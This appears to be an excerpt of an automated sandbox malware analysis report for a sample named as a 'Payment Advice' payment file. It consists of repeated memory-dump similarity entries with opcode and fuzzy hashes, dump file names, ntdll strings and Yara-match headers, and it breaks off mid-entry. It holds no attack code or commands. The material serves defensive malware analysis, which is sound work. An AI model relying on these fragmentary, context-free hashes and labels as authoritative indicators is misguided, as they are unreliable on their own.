                                                                                                                                            • Instruction ID: 35fddf054722259f02bc650cf70bff10800b184f4f2be5fc19f95f81d5006eaa
                                                                                                                                            • Opcode Fuzzy Hash: 9eb0b2e8f719b74f5db6efe80644cd2c0ad769f33bf4765a10d739a261a80c4f
                                                                                                                                            • Instruction Fuzzy Hash: 6E900221211C0042D60079684C14B070009D7D1303F55C159A5154654DCA15C9755621
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 60d8df57d4a2ce644795e7969377070f22ca836ce66bcdb901f3a0f1f93bbdbf
                                                                                                                                            • Instruction ID: ff9983fe463617b709a22a44228111a480aeb148094b11efa06c12e7641a8f0d
                                                                                                                                            • Opcode Fuzzy Hash: 60d8df57d4a2ce644795e7969377070f22ca836ce66bcdb901f3a0f1f93bbdbf
                                                                                                                                            • Instruction Fuzzy Hash: 7F90023120180402D50075584C087470009D7D1302F55C055AA164655FC765C9A56631
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b75127cfc3ed62bf3ef8ea5fe6daa92b8d986decb822163f8277949a7d623588
                                                                                                                                            • Instruction ID: 522526ef645af29ba2bdde2026fc67b43a77af0162ec5a26fd763a650bf997d4
                                                                                                                                            • Opcode Fuzzy Hash: b75127cfc3ed62bf3ef8ea5fe6daa92b8d986decb822163f8277949a7d623588
                                                                                                                                            • Instruction Fuzzy Hash: 2990022160140042454075688C449074009FBE2211755C165A5998650EC659C9795765
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fdbc2e3ada24834b8088756844176fcf4f0623a2fd11bdc55806137d0e48b4fe
                                                                                                                                            • Instruction ID: 9c441e0548fdf3b7908bb108588633ce84617fe817a1088bee5391b132133c4e
                                                                                                                                            • Opcode Fuzzy Hash: fdbc2e3ada24834b8088756844176fcf4f0623a2fd11bdc55806137d0e48b4fe
                                                                                                                                            • Instruction Fuzzy Hash: 6F90023120180402D50075584C1470B0009D7D1302F55C055A6164655EC725C9656671
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 327c910fa6e155c8b90729b13f3a2b958b4098b53f3f1bc60290975ab853839f
                                                                                                                                            • Instruction ID: fd1828bcf810ad4000e78f73c5bfa659115b1ce055bec4c76218f4f784c288b2
                                                                                                                                            • Opcode Fuzzy Hash: 327c910fa6e155c8b90729b13f3a2b958b4098b53f3f1bc60290975ab853839f
                                                                                                                                            • Instruction Fuzzy Hash: F590022130140402D50275584814607000DD7D2345F95C056E6424655EC725CA67A232
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 482539bf7a8705c6ae4dfee152355fd8bcf00a06bc91f27602c3018cdfcae6a8
                                                                                                                                            • Instruction ID: 42db8883c366a0e2b5d90701125f29f886f42ace7beb2995bf33ee337ee4cdeb
                                                                                                                                            • Opcode Fuzzy Hash: 482539bf7a8705c6ae4dfee152355fd8bcf00a06bc91f27602c3018cdfcae6a8
                                                                                                                                            • Instruction Fuzzy Hash: 4690026120180403D54079584C046070009D7D1302F55C055A7064655FCB29CD656235
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2c9a6bffedc0a68451a4fcb956086787b355065e46ee3d8f126083983cf9b4f2
                                                                                                                                            • Instruction ID: 15cc7ef1825b4161441bfb9b648e229ef87f4d1e9d2c785235429e117e393da9
                                                                                                                                            • Opcode Fuzzy Hash: 2c9a6bffedc0a68451a4fcb956086787b355065e46ee3d8f126083983cf9b4f2
                                                                                                                                            • Instruction Fuzzy Hash: D990027120140402D540755848047470009D7D1301F55C055AA064654FC759CEE96765
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 72f6ca27080a410b33170c2bbac8b7165b4e59b3b03b8f49115a2d1b111a1267
                                                                                                                                            • Instruction ID: 6e25587ee41c4920ac304671df0758b8ec309acfda2eded910b8f6ce2feb0971
                                                                                                                                            • Opcode Fuzzy Hash: 72f6ca27080a410b33170c2bbac8b7165b4e59b3b03b8f49115a2d1b111a1267
                                                                                                                                            • Instruction Fuzzy Hash: F990022160140502D50175584804617000ED7D1241F95C066A6024655FCB25CAA6A231
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 218e3a52ebe1284e0e1175f52078a961653bcb39de929ee2b9a71a432080addb
                                                                                                                                            • Instruction ID: 61957ad6709ed71abc12fd01df02550f19b33e62d3f29e236c35b7d11350e8d7
                                                                                                                                            • Opcode Fuzzy Hash: 218e3a52ebe1284e0e1175f52078a961653bcb39de929ee2b9a71a432080addb
                                                                                                                                            • Instruction Fuzzy Hash: 9090022120184442D54076584C04B0F4109D7E2202F95C05DA9156654DCA15C9695721
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: df72d992a4cbfe98dffa1a56e5bb4c400616e8927817a8cdc2a5b14ee88e8e5a
                                                                                                                                            • Instruction ID: b2ede5ba8e6f37d758959f277d066c1568759bd2d8bca50aa369dbbda9186582
                                                                                                                                            • Opcode Fuzzy Hash: df72d992a4cbfe98dffa1a56e5bb4c400616e8927817a8cdc2a5b14ee88e8e5a
                                                                                                                                            • Instruction Fuzzy Hash: 3D90022124140802D54075588814707000AD7D1601F55C055A5024654EC716CA7967B1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3f050a6902430020eaf58b23c7cf743406b636c4557ab3eb43352d2d12170731
                                                                                                                                            • Instruction ID: 24c8eba5b4148e0ecb106565f149debfa7d2b86eb8935d884e507be204479b04
                                                                                                                                            • Opcode Fuzzy Hash: 3f050a6902430020eaf58b23c7cf743406b636c4557ab3eb43352d2d12170731
                                                                                                                                            • Instruction Fuzzy Hash: 2590022124545102D550755C48046174009F7E1201F55C065A5814694EC655C9696321
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a70a96658fd9f2e6c0decde2e4beda66d737d990024a1c8fff638b73d6e0cd99
                                                                                                                                            • Instruction ID: 9b0dc904e54b3f38c82f80217640362e2dcbdb351ed71b7b164199c58c842ac5
                                                                                                                                            • Opcode Fuzzy Hash: a70a96658fd9f2e6c0decde2e4beda66d737d990024a1c8fff638b73d6e0cd99
                                                                                                                                            • Instruction Fuzzy Hash: 3A90023520140402D91075585C04647004AD7D1301F55D455A5424658EC754C9B5A221
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9283b2779a2ba4fc08473be2be270d9770d6311163a98334ab98fe745c8e3ab3
                                                                                                                                            • Instruction ID: 003bed328e40b0f05a465c3ca6e295b78b09987ca5b34a023e8185026ee75ad4
                                                                                                                                            • Opcode Fuzzy Hash: 9283b2779a2ba4fc08473be2be270d9770d6311163a98334ab98fe745c8e3ab3
                                                                                                                                            • Instruction Fuzzy Hash: 9290023120240142994076585C04A4F4109D7E2302B95D459A5015654DCA14C9755321
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                            • Instruction ID: c819e576ecfc7f3c36330631ac9be96764e046f6bb78eccbbab492c6e1fa3edc
                                                                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                            • Opcode ID: dd6c50a8b1618a86071014bd0eece8aa7b3705b000ca3b28c98415a7b308531e
                                                                                                                                            • Instruction ID: dd1fda815071e5edf389fa8705a94403f7f65dd05ed4d9f7f2fd6c69b4d31bae
                                                                                                                                            • Opcode Fuzzy Hash: dd6c50a8b1618a86071014bd0eece8aa7b3705b000ca3b28c98415a7b308531e
                                                                                                                                            • Instruction Fuzzy Hash: 415115B6A05156AFCB11DFAD8CA497EFBFEBB08240710826DE565D7246D334DE04C7A0
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                            • Opcode ID: 18ccf41d624f7b0f8ea73feeff068a44eda431aad82bae77344ec699f7f9133a
                                                                                                                                            • Instruction ID: a60d7eeedf12ad605b47007bf3092c85e12d252c03dbcae82e41fac5a5ae5395
                                                                                                                                            • Opcode Fuzzy Hash: 18ccf41d624f7b0f8ea73feeff068a44eda431aad82bae77344ec699f7f9133a
                                                                                                                                            • Instruction Fuzzy Hash: 8F51E475A00645EBDB60DF6CCD9097FFBB9EB44204B14849DE996C7643EAF4EE008760
                                                                                                                                            Strings
                                                                                                                                            • ExecuteOptions, xrefs: 017146A0
                                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01714655
                                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01714787
                                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01714742
                                                                                                                                            • Execute=1, xrefs: 01714713
                                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017146FC
                                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01714725
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                            • API String ID: 0-484625025
                                                                                                                                            • Opcode ID: 2eb30a61e4ae3ffa45c081a3f9c9e104b92aed1589c02bc70d89ec5ecc782a4a
                                                                                                                                            • Instruction ID: 79bee74418492fc993dc1fc041baf779a333ddc628b14f052bf5a1cadffd24ec
                                                                                                                                            • Opcode Fuzzy Hash: 2eb30a61e4ae3ffa45c081a3f9c9e104b92aed1589c02bc70d89ec5ecc782a4a
                                                                                                                                            • Instruction Fuzzy Hash: 63516B31A002297AEF20EBA9DC89FBD77B9EF15308F04059DE605A7281E7709A428F55
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                            • Instruction ID: 7d7bb5eb48e9e457364aa7fdece7432ae5fb5c0c0f39c82944ae5f102269edee
                                                                                                                                            • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                            • Instruction Fuzzy Hash: 85022671508742AFEB05CF18C894A6BFBE5EFC8704F148A2DF9854B268DB31E945CB52
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                            • String ID: +$-$0$0
                                                                                                                                            • API String ID: 1302938615-699404926
                                                                                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                            • Instruction ID: bda569eb9e6bc10e090fc056461c25a48061f5f79697cb97c7fa81207f88e556
                                                                                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                            • Instruction Fuzzy Hash: E481BD70A472598EEF298E6CCC997BEBBF2AF45320F18431AD961A7791C7308841CB55
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                                            • Opcode ID: 8c5ddb6475ab0280e017b395dba24c2a8a350e84704926d51da0bcb0b92aea0b
                                                                                                                                            • Instruction ID: e2dccdca26b1382fa6365e881a2c4ec470411418cc1b29fbb65ef4553c94b4fe
                                                                                                                                            • Opcode Fuzzy Hash: 8c5ddb6475ab0280e017b395dba24c2a8a350e84704926d51da0bcb0b92aea0b
                                                                                                                                            • Instruction Fuzzy Hash: 4A21517AA00119ABDB50DE79DC44ABFBBEDEF54650F04011AEE05E3201EB70D9058BA5
                                                                                                                                            Strings
                                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017102BD
                                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017102E7
                                                                                                                                            • RTL: Re-Waiting, xrefs: 0171031E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                            • API String ID: 0-2474120054
                                                                                                                                            • Opcode ID: db3b920c95c572bcc1f437780c55d85cf5665c74cfc3cb01ea24f36447d53cb7
                                                                                                                                            • Instruction ID: fd46d844b0e02882565073d38fa990284440d2367e327ac558f68d38f6992628
                                                                                                                                            • Opcode Fuzzy Hash: db3b920c95c572bcc1f437780c55d85cf5665c74cfc3cb01ea24f36447d53cb7
                                                                                                                                            • Instruction Fuzzy Hash: 74E1AD306087429FD725CF2CC884B6ABBE2FB84B14F140A9DF5A58B2D1D774D985CB52
                                                                                                                                            Strings
                                                                                                                                            • RTL: Resource at %p, xrefs: 01717B8E
                                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01717B7F
                                                                                                                                            • RTL: Re-Waiting, xrefs: 01717BAC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                            • API String ID: 0-871070163
                                                                                                                                            • Opcode ID: dcfee792edbafa5add579b8c3194332b5ab3cbbfcdbd2fb6163aad1808dcdd3c
                                                                                                                                            • Instruction ID: 8f68384f5e3ee27be19170127b99c8a5d06a552f31ce45a9b19a70c3bc9a332a
                                                                                                                                            • Opcode Fuzzy Hash: dcfee792edbafa5add579b8c3194332b5ab3cbbfcdbd2fb6163aad1808dcdd3c
                                                                                                                                            • Instruction Fuzzy Hash: 1C41F2317047028FDB24DE2DCC40B6AB7E5EF8A710F100A6DE956D7384DB31E9058B91
                                                                                                                                            APIs
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0171728C
                                                                                                                                            Strings
                                                                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01717294
                                                                                                                                            • RTL: Resource at %p, xrefs: 017172A3
                                                                                                                                            • RTL: Re-Waiting, xrefs: 017172C1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                            • API String ID: 885266447-605551621
                                                                                                                                            • Opcode ID: 98ceedfcf41a30a1ce6ef4739c208a61180d6a471cb245a73ec3eb48c591fb6f
                                                                                                                                            • Instruction ID: d85d0c8f73b6ebde370ebf40059a4518bca9e505286007c5866986d10fa028fc
                                                                                                                                            • Opcode Fuzzy Hash: 98ceedfcf41a30a1ce6ef4739c208a61180d6a471cb245a73ec3eb48c591fb6f
                                                                                                                                            • Instruction Fuzzy Hash: 03410231B05202ABD725DE29CC41FAAF7B5FF95710F20061DF995EB248DB20E80287D1
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                                            • Opcode ID: 4ea44220edf189ea3cfb5b539872a6101dc46f996d287986c05aadbc32e51140
                                                                                                                                            • Instruction ID: 1a4612b76e3fce9d0fcfc7b50d228414fa6b304ba163cd025c1585fe7ffeb1cc
                                                                                                                                            • Opcode Fuzzy Hash: 4ea44220edf189ea3cfb5b539872a6101dc46f996d287986c05aadbc32e51140
                                                                                                                                            • Instruction Fuzzy Hash: 4B319A72A00119EFDB60DF2DCC44BEEB7F9EF44610F444599ED49D3202EB709A498BA0
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                            • String ID: +$-
                                                                                                                                            • API String ID: 1302938615-2137968064
                                                                                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                            • Instruction ID: 772eeb383adbb66873d5bcaf785f00133d8a61b73acc0b8ffb306426b1c371d1
                                                                                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                            • Instruction Fuzzy Hash: E991A371E0220A9AEB24DF6DCC886BEBBE5EF44320F24471AE955E73C0E7309941C791
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $$@
                                                                                                                                            • API String ID: 0-1194432280
                                                                                                                                            • Opcode ID: 6a30fc3715a95699e67d99135d4976569d6c5062e18a04b91f2f7e64870e4766
                                                                                                                                            • Instruction ID: ae9e98dd81a80d879e6391a6f4ab10c993e704dfab1d1253a4e2e341478ff428
                                                                                                                                            • Opcode Fuzzy Hash: 6a30fc3715a95699e67d99135d4976569d6c5062e18a04b91f2f7e64870e4766
                                                                                                                                            • Instruction Fuzzy Hash: E7812B72D00269DBDB32CB54CC44BEABBB4AB08714F1045EAEA09B7280D7705E85CFA4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7cc022dd0d4ff544372aa1226e27bcb42a7173dc4a4e943c4a16236641d3bd68
                                                                                                                                            • Instruction ID: 98f6dfc4053cc09b73b2d50449290eb15c09bd19aa82d929cdffca6dd99f101d
                                                                                                                                            • Opcode Fuzzy Hash: 7cc022dd0d4ff544372aa1226e27bcb42a7173dc4a4e943c4a16236641d3bd68
                                                                                                                                            • Instruction Fuzzy Hash: CA3194117593F14ED31E436D08B9675AFC28E9720174EC2EEDADA5F2E3C4888409D3A5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
